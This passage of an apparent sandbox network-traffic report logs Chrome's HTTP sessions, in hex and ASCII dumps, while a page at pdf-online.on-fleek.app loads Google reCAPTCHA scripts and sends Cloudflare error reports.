                                              Data Ascii: failed to resolve /ipfs/bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5nd
                                              2024-09-27 06:18:11 UTC128INData Raw: 62 63 6e 32 70 69 69 64 69 34 6d 75 63 72 61 6a 66 37 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 2f 3a 20 6e 6f 20 6c 69 6e 6b 20 6e 61 6d 65 64 20 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 75 6e 64 65 72 20 62 61 66 79 62 65 69 66 6d 62 75 32 74 74 77 61 62 74 69 35 78 70 37 37 79 73 33 78 32 33 76 36 71 64 6b 75 64 35 6e 64 62 63 6e 32 70 69 69 64 69 34 6d 75 63 72 61 6a 66 37 6d 0a
                                              Data Ascii: bcn2piidi4mucrajf7m/favicon.ico/: no link named "favicon.ico" under bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449767142.250.184.1964433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:10 UTC495OUTGET /recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:11 UTC917INHTTP/1.1 200 OK
                                              Content-Type: text/javascript; charset=utf-8
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                              Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                              Expires: Fri, 27 Sep 2024 06:18:10 GMT
                                              Date: Fri, 27 Sep 2024 06:18:10 GMT
                                              Cache-Control: private, max-age=300
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                              Cross-Origin-Resource-Policy: same-site
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2024-09-27 06:18:11 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 78 64 73 30 72 7a 47 72 6b 74 52 38 38 75 45 5a 32 4a 55 76 64 67 4f 59 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                              Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js');
                                              2024-09-27 06:18:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449769142.250.184.1964433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:11 UTC487OUTGET /js/bg/zEg4NaMiOUeKKZ2pqXY4HMvMf5VCq4avNU_6WgNs2Cw.js HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:11 UTC811INHTTP/1.1 200 OK
                                              Accept-Ranges: bytes
                                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                              Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                              Content-Length: 18702
                                              X-Content-Type-Options: nosniff
                                              Server: sffe
                                              X-XSS-Protection: 0
                                              Date: Thu, 26 Sep 2024 03:53:52 GMT
                                              Expires: Fri, 26 Sep 2025 03:53:52 GMT
                                              Cache-Control: public, max-age=31536000
                                              Last-Modified: Tue, 17 Sep 2024 15:00:00 GMT
                                              Content-Type: text/javascript
                                              Vary: Accept-Encoding
                                              Age: 95059
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              2024-09-27 06:18:11 UTC579INData Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 50 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 29 7b 69 66 28 21 28 41 3d 28 56 3d 6e 75 6c 6c 2c 4c 29 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 41 29 7c 7c 21 41 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 56 3b 74 72 79 7b 56 3d 41 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 6b 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 6b 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 6b 7d
                                              Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var P=function(V,A){if(!(A=(V=null,L).trustedTypes,A)||!A.createPolicy)return V;try{V=A.createPolicy("bg",{createHTML:k,createScript:k,createScriptURL:k}
                                              2024-09-27 06:18:11 UTC1390INData Raw: 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 27 2c 0a 27 2a 2f 27 2c 0a 27 76 61 72 20 6f 6b 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 29 7b 69 66 28 56 2e 6c 65 6e 67 74 68 3d 3d 33 29 7b 66 6f 72 28 67 3d 30 3b 67 3c 33 3b 67 2b 2b 29 41 5b 67 5d 2b 3d 56 5b 67 5d 3b 66 6f 72 28 67 3d 28 56 3d 5b 31 33 2c 38 2c 31 33 2c 31 32 2c 31 36 2c 35 2c 33 2c 31 30 2c 31 35 5d 2c 30 29 3b 67 3c 39 3b 67 2b 2b 29 41 5b 33 5d 28 41 2c 67 25 33 2c 56 5b 67 5d 29 7d 7d 2c 59 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 29 7b 69 66 28 56 3d 3d 34 37 36 7c 7c 56 3d 3d 31 36 36 29 41 2e 54 5b 56 5d 3f 41 2e 54 5b 56 5d 2e 63 6f 6e 63 61 74 28 67 29 3a 41 2e 54 5b 56 5d 3d 56 7a 28 67 2c 41 29 3b 65 6c 73 65 7b 69 66
                                              Data Ascii: X-License-Identifier: Apache-2.0','*/','var ok=function(V,A,g){if(V.length==3){for(g=0;g<3;g++)A[g]+=V[g];for(g=(V=[13,8,13,12,16,5,3,10,15],0);g<9;g++)A[3](A,g%3,V[g])}},Y=function(V,A,g){if(V==476||V==166)A.T[V]?A.T[V].concat(g):A.T[V]=Vz(g,A);else{if
                                              2024-09-27 06:18:11 UTC1390INData Raw: 76 6f 69 64 20 30 2c 42 29 2c 28 56 2e 44 3d 66 61 6c 73 65 2c 56 29 2e 73 3d 31 2c 5b 5d 29 2c 56 2e 67 3d 5b 5d 2c 56 2e 4f 3d 76 6f 69 64 20 30 2c 56 2e 58 3d 76 6f 69 64 20 30 2c 28 56 2e 49 3d 28 56 2e 42 3d 66 61 6c 73 65 2c 56 2e 54 3d 28 56 2e 53 3d 30 2c 56 2e 4e 5f 3d 30 2c 5b 5d 29 2c 56 2e 6b 69 3d 66 61 6c 73 65 2c 56 2e 4a 3d 30 2c 28 56 2e 6c 3d 56 2c 56 29 2e 47 3d 30 2c 30 29 2c 56 29 2e 58 71 3d 32 35 2c 28 28 56 2e 52 30 3d 28 28 56 2e 6c 5a 3d 5b 5d 2c 56 29 2e 70 71 3d 67 2c 66 61 6c 73 65 29 2c 56 29 2e 43 3d 30 2c 56 29 2e 55 3d 28 56 2e 48 42 3d 38 30 30 31 2c 56 2e 46 3d 30 2c 56 2e 41 3d 6e 75 6c 6c 2c 28 56 2e 6a 3d 5b 5d 2c 56 2e 6f 30 3d 5b 5d 2c 56 2e 4e 3d 28 56 2e 48 3d 76 6f 69 64 20 30 2c 30 29 2c 56 29 2e 68 3d 76 6f 69
                                              Data Ascii: void 0,B),(V.D=false,V).s=1,[]),V.g=[],V.O=void 0,V.X=void 0,(V.I=(V.B=false,V.T=(V.S=0,V.N_=0,[]),V.ki=false,V.J=0,(V.l=V,V).G=0,0),V).Xq=25,((V.R0=((V.lZ=[],V).pq=g,false),V).C=0,V).U=(V.HB=8001,V.F=0,V.A=null,(V.j=[],V.o0=[],V.N=(V.H=void 0,0),V).h=voi
                                              2024-09-27 06:18:11 UTC1390INData Raw: 50 2c 4c 2e 6c 29 29 29 29 29 7d 29 2c 56 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 29 7b 28 4c 3d 28 50 3d 4f 28 4c 29 2c 78 28 50 2c 4c 2e 6c 29 29 2c 4c 29 5b 30 5d 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 4c 5b 31 5d 2c 4c 5b 32 5d 2c 77 29 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 2c 53 29 7b 21 64 28 74 72 75 65 2c 66 61 6c 73 65 2c 4c 2c 50 29 26 26 28 50 3d 46 47 28 4c 29 2c 49 3d 50 2e 71 5f 2c 53 3d 50 2e 64 56 2c 4c 2e 6c 3d 3d 4c 7c 7c 53 3d 3d 4c 2e 6e 71 26 26 49 3d 3d 4c 29 26 26 28 59 28 50 2e 4d 5f 2c 4c 2c 53 2e 61 70 70 6c 79 28 49 2c 50 2e 4b 29 29 2c 4c 2e 55 3d 4c 2e 52 28 29 29 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 2c 53 29 7b 28 50 3d 28 49 3d 28 53 3d 28 50 3d 28 49 3d 4f 28 4c 29 2c
                                              Data Ascii: P,L.l)))))}),V),function(L,P){(L=(P=O(L),x(P,L.l)),L)[0].removeEventListener(L[1],L[2],w)}),function(L,P,I,S){!d(true,false,L,P)&&(P=FG(L),I=P.q_,S=P.dV,L.l==L||S==L.nq&&I==L)&&(Y(P.M_,L,S.apply(I,P.K)),L.U=L.R())})),function(L,P,I,S){(P=(I=(S=(P=(I=O(L),
                                              2024-09-27 06:18:11 UTC1390INData Raw: 29 2c 32 35 34 29 2c 56 2c 66 75 6e 63 74 69 6f 6e 28 4c 29 7b 59 4f 28 4c 2c 33 29 7d 29 2c 56 29 2c 5b 5d 29 2c 32 36 32 29 2c 56 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 2c 53 29 7b 59 28 28 50 3d 4f 28 28 53 3d 4f 28 4c 29 2c 4c 29 29 2c 49 3d 4f 28 4c 29 2c 49 29 2c 4c 2c 78 28 53 2c 4c 29 7c 7c 78 28 50 2c 4c 29 29 7d 29 2c 30 29 2c 56 29 2c 36 37 35 29 2c 56 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 2c 53 29 7b 59 28 28 50 3d 28 49 3d 28 53 3d 28 49 3d 4f 28 4c 29 2c 4f 28 4c 29 29 2c 78 28 49 2c 4c 29 29 2c 78 29 28 53 2c 4c 29 2c 53 29 2c 4c 2c 50 2b 49 29 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 4c 2c 50 2c 49 29 7b 59 28 28 49 3d 28 50 3d 4f 28 4c 29 2c 4f 28 4c 29 29 2c 49 29 2c 4c 2c 22 22 2b 78 28 50 2c 4c 29 29 7d 29 29 2c 56 29 2c 66
                                              Data Ascii: ),254),V,function(L){YO(L,3)}),V),[]),262),V,function(L,P,I,S){Y((P=O((S=O(L),L)),I=O(L),I),L,x(S,L)||x(P,L))}),0),V),675),V),function(L,P,I,S){Y((P=(I=(S=(I=O(L),O(L)),x(I,L)),x)(S,L),S),L,P+I)}),function(L,P,I){Y((I=(P=O(L),O(L)),I),L,""+x(P,L))})),V),f
                                              2024-09-27 06:18:11 UTC1390INData Raw: 75 6e 63 74 69 6f 6e 28 56 2c 41 29 7b 72 65 74 75 72 6e 20 41 3d 5a 28 56 29 2c 41 26 31 32 38 26 26 28 41 3d 41 26 31 32 37 7c 5a 28 56 29 3c 3c 37 29 2c 41 7d 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 2c 4a 2c 42 2c 66 2c 62 2c 4c 2c 50 2c 49 2c 53 2c 70 2c 4b 29 7b 69 66 28 70 3d 78 28 34 37 36 2c 67 29 2c 70 3e 3d 67 2e 47 29 74 68 72 6f 77 5b 43 2c 33 31 5d 3b 66 6f 72 28 66 3d 28 42 3d 28 6b 3d 30 2c 67 2e 73 62 2e 6c 65 6e 67 74 68 29 2c 49 3d 41 2c 70 29 3b 49 3e 30 3b 29 53 3d 66 3e 3e 33 2c 62 3d 66 25 38 2c 4a 3d 67 2e 67 5b 53 5d 2c 4c 3d 38 2d 28 62 7c 30 29 2c 4c 3d 4c 3c 49 3f 4c 3a 49 2c 56 26 26 28 4b 3d 67 2c 50 3d 66 2c 4b 2e 48 21 3d 50 3e 3e 36 26 26 28 4b 2e 48 3d 50 3e 3e 36 2c 50 3d 78 28 31 38 33 2c 4b 29 2c 4b 2e
                                              Data Ascii: unction(V,A){return A=Z(V),A&128&&(A=A&127|Z(V)<<7),A},F=function(V,A,g,k,J,B,f,b,L,P,I,S,p,K){if(p=x(476,g),p>=g.G)throw[C,31];for(f=(B=(k=0,g.sb.length),I=A,p);I>0;)S=f>>3,b=f%8,J=g.g[S],L=8-(b|0),L=L<I?L:I,V&&(K=g,P=f,K.H!=P>>6&&(K.H=P>>6,P=x(183,K),K.
                                              2024-09-27 06:18:11 UTC1390INData Raw: 41 7c 30 29 2b 32 29 25 33 5d 2c 56 5b 41 5d 3d 28 56 5b 41 5d 7c 30 29 2d 28 56 5b 28 28 41 7c 30 29 2b 31 29 25 33 5d 7c 30 29 2d 28 6b 7c 30 29 5e 28 41 3d 3d 31 3f 6b 3c 3c 67 3a 6b 3e 3e 3e 67 29 7d 63 61 74 63 68 28 4a 29 7b 74 68 72 6f 77 20 4a 3b 7d 7d 2c 57 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 2c 4a 2c 42 29 7b 69 66 28 56 2e 56 2e 6c 65 6e 67 74 68 29 7b 56 2e 42 3d 28 56 2e 42 26 26 22 3a 54 51 52 3a 54 51 52 3a 22 28 29 2c 74 72 75 65 29 2c 56 2e 51 32 3d 41 3b 74 72 79 7b 4a 3d 56 2e 52 28 29 2c 56 2e 4a 3d 30 2c 56 2e 55 3d 4a 2c 56 2e 53 3d 4a 2c 56 2e 57 3d 30 2c 6b 3d 58 47 28 56 2c 41 29 2c 41 3d 67 3f 30 3a 31 30 2c 42 3d 56 2e 52 28 29 2d 56 2e 53 2c 56 2e 49 2b 3d 42 2c 56 2e 56 32 26 26 56 2e 56 32 28 42 2d 56 2e 46 2c
                                              Data Ascii: A|0)+2)%3],V[A]=(V[A]|0)-(V[((A|0)+1)%3]|0)-(k|0)^(A==1?k<<g:k>>>g)}catch(J){throw J;}},W=function(V,A,g,k,J,B){if(V.V.length){V.B=(V.B&&":TQR:TQR:"(),true),V.Q2=A;try{J=V.R(),V.J=0,V.U=J,V.S=J,V.W=0,k=XG(V,A),A=g?0:10,B=V.R()-V.S,V.I+=B,V.V2&&V.V2(B-V.F,
                                              2024-09-27 06:18:11 UTC1390INData Raw: 73 2e 6e 2b 2b 2c 74 68 69 73 2e 6f 2e 6c 65 6e 67 74 68 3c 35 30 29 3f 74 68 69 73 2e 6f 2e 70 75 73 68 28 6b 29 3a 28 4a 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 74 68 69 73 2e 6e 29 2c 4a 3c 35 30 26 26 28 74 68 69 73 2e 6f 5b 4a 5d 3d 6b 29 29 7d 2c 67 29 2e 70 72 6f 74 6f 74 79 70 65 2e 47 58 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 6e 3d 3d 3d 30 29 72 65 74 75 72 6e 5b 30 2c 30 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 6b 2c 4a 29 7b 72 65 74 75 72 6e 20 6b 2d 4a 7d 29 2c 5b 74 68 69 73 2e 6e 2c 74 68 69 73 2e 6f 5b 74 68 69 73 2e 6f 2e 6c 65 6e 67 74 68 3e 3e 31 5d 5d 7d 2c 6e 65 77 20 67 29 2c 6e 65 77 20 67 29 2c 66 75 6e 63 74 69 6f 6e 28 6b
                                              Data Ascii: s.n++,this.o.length<50)?this.o.push(k):(J=Math.floor(Math.random()*this.n),J<50&&(this.o[J]=k))},g).prototype.GX=function(){if(this.n===0)return[0,0];return this.o.sort(function(k,J){return k-J}),[this.n,this.o[this.o.length>>1]]},new g),new g),function(k
                                              2024-09-27 06:18:11 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 56 7d 2c 67 2e 63 6f 6e 63 61 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 56 3d 6b 7d 2c 67 7d 2c 79 7a 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 29 7b 6c 28 28 67 3d 4f 28 28 6b 3d 4f 28 56 29 2c 56 29 29 2c 67 29 2c 7a 28 78 28 6b 2c 56 29 2c 41 29 2c 56 29 7d 2c 75 51 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 29 7b 72 65 74 75 72 6e 28 59 28 34 37 36 2c 56 2c 28 51 7a 28 56 2c 28 28 6b 3d 78 28 34 37 36 2c 56 29 2c 56 2e 67 26 26 6b 3c 56 2e 47 29 3f 28 59 28 34 37 36 2c 56 2c 56 2e 47 29 2c 50 34 28 56 2c 41 29 29 3a 59 28 34 37 36 2c 56 2c 41 29 2c 67 29 29 2c 6b 29 29 2c 78 29 28 35 34 2c 56 29 7d 2c 77 61 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 29 7b 72 65 74 75 72 6e 20 56 28 66 75 6e
                                              Data Ascii: nction(){return V},g.concat=function(k){V=k},g},yz=function(V,A,g,k){l((g=O((k=O(V),V)),g),z(x(k,V),A),V)},uQ=function(V,A,g,k){return(Y(476,V,(Qz(V,((k=x(476,V),V.g&&k<V.G)?(Y(476,V,V.G),P4(V,A)):Y(476,V,A),g)),k)),x)(54,V)},wa=function(V,A){return V(fun
                                              2024-09-27 06:18:11 UTC1390INData Raw: 2c 4c 7d 2c 66 7d 2c 4e 78 3d 66 75 6e 63 74 69 6f 6e 28 56 2c 41 2c 67 2c 6b 2c 4a 29 7b 66 6f 72 28 56 3d 28 6b 3d 28 4a 3d 56 5b 32 5d 7c 30 2c 30 29 2c 56 5b 33 5d 7c 30 29 3b 6b 3c 31 35 3b 6b 2b 2b 29 41 3d 41 3e 3e 3e 38 7c 41 3c 3c 32 34 2c 56 3d 56 3e 3e 3e 38 7c 56 3c 3c 32 34 2c 41 2b 3d 67 7c 30 2c 41 5e 3d 4a 2b 32 31 33 31 2c 67 3d 67 3c 3c 33 7c 67 3e 3e 3e 32 39 2c 56 2b 3d 4a 7c 30 2c 4a 3d 4a 3c 3c 33 7c 4a 3e 3e 3e 32 39 2c 67 5e 3d 41 2c 56 5e 3d 6b 2b 32 31 33 31 2c 4a 5e 3d 56 3b 72 65 74 75 72 6e 5b 67 3e 3e 3e 32 34 26 32 35 35 2c 67 3e 3e 3e 31 36 26 32 35 35 2c 67 3e 3e 3e 38 26 32 35 35 2c 67 3e 3e 3e 30 26 32 35 35 2c 41 3e 3e 3e 32 34 26 32 35 35 2c 41 3e 3e 3e 31 36 26 32 35 35 2c 41 3e 3e 3e 38 26 32 35 35 2c 41 3e 3e 3e 30
                                              Data Ascii: ,L},f},Nx=function(V,A,g,k,J){for(V=(k=(J=V[2]|0,0),V[3]|0);k<15;k++)A=A>>>8|A<<24,V=V>>>8|V<<24,A+=g|0,A^=J+2131,g=g<<3|g>>>29,V+=J|0,J=J<<3|J>>>29,g^=A,V^=k+2131,J^=V;return[g>>>24&255,g>>>16&255,g>>>8&255,g>>>0&255,A>>>24&255,A>>>16&255,A>>>8&255,A>>>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.44977135.190.80.14433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:11 UTC548OUTOPTIONS /report/v4?s=VyL2DB2ayCzgiDeRzfdn0HgmcIe4USBs1LNUtzg3SyQSqKH%2Fzy3P06wNalmtcPSflUw%2FSaEablPKxwZmOliR4meZT0E9EcIlzWFIun6NFikklVpC1VXEBDDPgyeKlxqbkXOvRyKgtDq8 HTTP/1.1
                                              Host: a.nel.cloudflare.com
                                              Connection: keep-alive
                                              Origin: https://pdf-online.on-fleek.app
                                              Access-Control-Request-Method: POST
                                              Access-Control-Request-Headers: content-type
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:12 UTC336INHTTP/1.1 200 OK
                                              Content-Length: 0
                                              access-control-max-age: 86400
                                              access-control-allow-methods: OPTIONS, POST
                                              access-control-allow-origin: *
                                              access-control-allow-headers: content-length, content-type
                                              date: Fri, 27 Sep 2024 06:18:11 GMT
                                              Via: 1.1 google
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.44977435.190.80.14433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:15 UTC482OUTPOST /report/v4?s=VyL2DB2ayCzgiDeRzfdn0HgmcIe4USBs1LNUtzg3SyQSqKH%2Fzy3P06wNalmtcPSflUw%2FSaEablPKxwZmOliR4meZT0E9EcIlzWFIun6NFikklVpC1VXEBDDPgyeKlxqbkXOvRyKgtDq8 HTTP/1.1
                                              Host: a.nel.cloudflare.com
                                              Connection: keep-alive
                                              Content-Length: 436
                                              Content-Type: application/reports+json
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:15 UTC436OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 39 31 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 70 64 66 2d 6f 6e 6c 69 6e 65 2e 6f 6e 2d 66 6c 65 65 6b 2e 61 70 70 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 36 2e 31 33 2e 31 34 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22
                                              Data Ascii: [{"age":0,"body":{"elapsed_time":916,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://pdf-online.on-fleek.app/","sampling_fraction":1.0,"server_ip":"104.26.13.141","status_code":404,"type":"http.error"},"type":"network-error"
                                              2024-09-27 06:18:15 UTC168INHTTP/1.1 200 OK
                                              Content-Length: 0
                                              date: Fri, 27 Sep 2024 06:18:14 GMT
                                              Via: 1.1 google
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449775216.58.206.364433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:15 UTC878OUTGET /recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: iframe
                                              Referer: https://pdf-online.on-fleek.app/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:15 UTC1161INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                              Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 27 Sep 2024 06:18:15 GMT
                                              Content-Security-Policy: script-src 'report-sample' 'nonce-2D8s5bSMgiYSjpVJQX7qmQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
